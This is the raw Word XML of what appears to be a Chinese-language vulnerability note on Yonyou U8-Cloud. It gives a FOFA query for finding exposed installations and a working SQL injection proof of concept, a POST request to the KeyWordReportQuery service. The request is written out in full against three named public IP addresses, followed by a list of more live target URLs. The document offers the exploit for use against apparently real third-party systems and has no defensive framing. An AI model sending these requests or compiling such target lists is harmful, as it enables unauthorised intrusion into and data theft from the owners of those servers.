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FEFF0" w14:textId="4851660E" w:rsidR="00E47BA9" w:rsidRDefault="00E47BA9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>fofa:app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>用友</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>-U8-Cloud"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315611A1" w14:textId="2781E737" w:rsidR="004D12BC" w:rsidRDefault="006950DF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产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:</w:t>
      </w:r>
      <w:r w:rsidRPr="006950DF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00C4269C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://59.173.180.202:808</w:t>
        </w:r>
        <w:r w:rsidRPr="00C4269C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>8/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48C5B45E" w14:textId="48D2A08A" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040B86B1" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>POST /service/~</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iufo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc.itf.iufo.mobilereport.data.KeyWordReportQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AD50B" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>Host: 59.173.180.202:8088</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BEF4B" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>User-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Agent:Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E80A74" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DE5E7DE" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>Content-Length: 95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FD26DC" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF"/>
    <w:p w14:paraId="522FE928" w14:textId="35C89F76" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>{"reportType":"1' and 1=user--+","</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pageInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"currentPageIndex":1,"pageSize":1},"keyword":[]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD7EDA9" w14:textId="7952B4E8" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F3130D" wp14:editId="67845E7E">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="435864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641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EE4F" w14:textId="1D3BCA3B" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19C9EE56" wp14:editId="541073EE">
            <wp:extent cx="5274310" cy="3500755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1968634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344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985C" w14:textId="07335E57" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产二：</w:t>
      </w:r>
      <w:r>
        <w:t>121.199.45.84:8088</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BFAFA8" w14:textId="0630FA56" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1106C5F5" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>POST /service/~</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iufo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc.itf.iufo.mobilereport.data.KeyWordReportQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE51362" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>Host: 121.199.45.84:8088</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E25661A" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>User-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Agent:Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCAC291" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C972DAF" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>Content-Length: 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC079E7" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF"/>
    <w:p w14:paraId="291158E7" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>{"reportType":"1' and 1=user--+","</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pageInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"currentPageIndex":1,"pageSize":1},"keyword":[]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F4E6C1" w14:textId="77777777" w:rsidR="006950DF" w:rsidRPr="006950DF" w:rsidRDefault="006950DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203A2558" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60295042" w14:textId="4ABF194B" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68046C58" wp14:editId="1D73ED99">
            <wp:extent cx="5274310" cy="3523957"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="138620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06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989" cy="352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8E58" w14:textId="6A3B4383" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E99F125" wp14:editId="51EF29A9">
            <wp:extent cx="5274310" cy="3500755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="659625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257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8D4F" w14:textId="187F9F76" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67812CFB" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF"/>
    <w:p w14:paraId="72662609" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF"/>
    <w:p w14:paraId="56E71972" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF"/>
    <w:p w14:paraId="65A2EB6E" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF"/>
    <w:p w14:paraId="3D363BF7" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF"/>
    <w:p w14:paraId="02F77A48" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF"/>
    <w:p w14:paraId="7EB34A7D" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF"/>
    <w:p w14:paraId="3847B3A1" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF"/>
    <w:p w14:paraId="265CF1A2" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF"/>
    <w:p w14:paraId="10E12921" w14:textId="23410432" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产三：</w:t>
      </w:r>
      <w:r>
        <w:t>117.146.249.174:8088</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A38BED" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>POST /service/~</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iufo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc.itf.iufo.mobilereport.data.KeyWordReportQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123BEE79" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>Host: 117.146.249.174:8088</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203856AD" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>User-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Agent:Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61DF99" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41CBC5A0" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>Content-Length: 99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41696B2F" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF"/>
    <w:p w14:paraId="0441BEAC" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF">
      <w:r>
        <w:t>{"reportType":"1' and 1=user--+","</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pageInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"currentPageIndex":1,"pageSize":1},"keyword":[]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C82BB" w14:textId="77777777" w:rsidR="006950DF" w:rsidRDefault="006950DF" w:rsidP="006950DF"/>
    <w:p w14:paraId="21630BF9" w14:textId="77777777" w:rsidR="006950DF" w:rsidRPr="006950DF" w:rsidRDefault="006950DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7010AF29" w14:textId="473A3FA3" w:rsidR="006950DF" w:rsidRDefault="006950DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20A826E9" wp14:editId="74E9D07F">
            <wp:extent cx="5274310" cy="3448050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="95019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96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C8680" wp14:editId="6877331D">
            <wp:extent cx="5274310" cy="4140835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1364990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903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8DD8" w14:textId="2BC4554A" w:rsidR="006950DF" w:rsidRDefault="002E2B71">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00C4269C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://47.94.218.132:8088/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FA1E04D" w14:textId="705C43F5" w:rsidR="002E2B71" w:rsidRDefault="002E2B71">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00C4269C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://111.50.89.154:8088/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1278D61F" w14:textId="2E8085DF" w:rsidR="002E2B71" w:rsidRDefault="002E2B71">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00C4269C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://139.9.243.81:8899/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1407057C" w14:textId="63445BE0" w:rsidR="002E2B71" w:rsidRDefault="002E2B71" w:rsidP="002E2B71">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00C4269C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://27.151.80.37:98/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E79138F" w14:textId="7D7E2C10" w:rsidR="002E2B71" w:rsidRDefault="002E2B71" w:rsidP="002E2B71">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00C4269C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://218.76.30.160:8088/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D90B797" w14:textId="7652E910" w:rsidR="002E2B71" w:rsidRDefault="002E2B71" w:rsidP="002E2B71">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00C4269C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://114.67.95.228:8888/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64FBEE2C" w14:textId="77777777" w:rsidR="002E2B71" w:rsidRDefault="002E2B71" w:rsidP="002E2B71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A28769A" w14:textId="409043D8" w:rsidR="002E2B71" w:rsidRDefault="002E2B71" w:rsidP="002E2B71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002E2B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DF"/>
    <w:rsid w:val="00013CF5"/>
    <w:rsid w:val="002E2B71"/>
    <w:rsid w:val="002F0215"/>
    <w:rsid w:val="004D12BC"/>
    <w:rsid w:val="00613CC0"/>
    <w:rsid w:val="006950DF"/>
    <w:rsid w:val="00737C9B"/>
    <w:rsid w:val="00BA52CA"/>
    <w:rsid w:val="00DB6BF4"/>
    <w:rsid w:val="00E4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D4CB0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5CF9258F-B5D9-4783-AA00-ED6B1FA1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50D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95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139.9.243.81:8899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111.50.89.154:8088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114.67.95.228:8888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47.94.218.132:8088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218.76.30.160:8088/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://59.173.180.202:8088/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://27.151.80.37:98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262</Words>
  <Characters>1498</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>12</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop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承威 陆</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>承威 陆</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-13T06:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-13T07:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>